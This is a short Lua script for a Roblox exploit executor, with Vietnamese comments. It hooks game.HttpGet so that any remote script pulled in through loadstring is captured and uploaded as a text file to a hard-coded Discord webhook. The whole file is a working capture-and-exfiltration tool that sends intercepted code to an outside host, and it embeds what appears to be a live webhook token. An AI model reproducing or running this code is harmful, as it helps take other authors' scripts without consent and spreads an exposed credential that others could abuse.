local HttpService = game:GetService("HttpService")

-- Webhook của bạn đã được lắp vào đây
local WEBHOOK_URL = "https://discord.com/api/webhooks/1405916308431704176/BoCB5BoazAcDU0jTHQqepVNBvXdTkCp6hsUavUCK_zNuDB26fQZYj8z5Buyh57zC6hH4"

-- Hàm gửi file qua Webhook (Sử dụng RequestAsync để tránh lỗi InvalidUrl)
local function sendFile(fileName, content)
    local boundary = "---------------------------" .. string.sub(HttpService:GenerateGUID(false), 1, 15)
    local body = table.concat({
        "--" .. boundary,
        "Content-Disposition: form-data; name=\"file\"; filename=\"" .. fileName .. "\"",
        "Content-Type: text/plain",
        "",
        content,
        "--" .. boundary .. "--",
        ""
    }, "\r\n")

    local success, response = pcall(function()
        return HttpService:RequestAsync({
            Url = WEBHOOK_URL,
            Method = "POST",
            Headers = {
                ["Content-Type"] = "multipart/form-data; boundary=" .. boundary
            },
            Body = body
        })
    end)
    
    if success then
        print(" Đã gửi file hook qua dis rồi cu")
    else
        warn("Lỗi gửi Webhook: " .. tostring(response))
    end
end

-- Hook hàm HttpGet để tự động bắt script khi bạn loadstring
local oldHttpGet
oldHttpGet = hookfunction(game.HttpGet, function(self, url, ...)
    -- Kiểm tra nếu URL hợp lệ
    if type(url) == "string" and url:find("http") then
        print("🔍 Đang bắt dữ liệu từ: " .. url)
        
        local content = oldHttpGet(self, url, ...)
        
        -- Gửi code bắt được về Discord dưới dạng file .txt
        task.spawn(function()
            sendFile("dumped_script.txt", content)
        end)
        
        return content
    end
    return oldHttpGet(self, url, ...)
end)

print("load xong rồi chạy link raw đi cu")
